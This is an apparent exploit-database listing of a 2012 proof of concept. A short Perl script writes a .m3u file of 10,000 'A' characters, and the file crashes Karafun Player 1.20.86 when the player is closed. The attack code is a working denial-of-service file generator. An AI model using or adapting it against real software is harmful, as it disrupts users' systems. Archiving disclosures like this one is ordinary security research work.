Lucene search
K

Karafun Player 1.20.86 - .m3u Crash (PoC)

🗓️ 16 Jun 2012 00:00:00Reported by StyxosaurusType 
exploitpack
 exploitpack
👁 18 Views

Karafun Player V1.20.86 .m3u file Denial of Service when trying to close the player after running a special crafted .m3u file

Code
# 
# Exploit Title: Karafun Player V1.20.86 .m3u file Denial of Service
# Date: 2012.6.15
# Vulnerability Discovered & Exploit by Styxosaurus
# Styxosaurus [at] gmail [dot] com
#
# Software Link: http://www.karafun.com/karaokeplayer/
# Version: V1.20.86
# Description:
#             Karafun will crash and not responding when trying to close it after
#             runs a special crafted .m3u file.

my $JUNK= "A" x 10000;
my $FILE="Karafun.m3u";
open(my $FILE, ">$FILE") or die "Cannot open $file: $!";
print $FILE $JUNK;
close($FILE);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jun 2012 00:00Current
0.2Low risk
Vulners AI Score0.2
18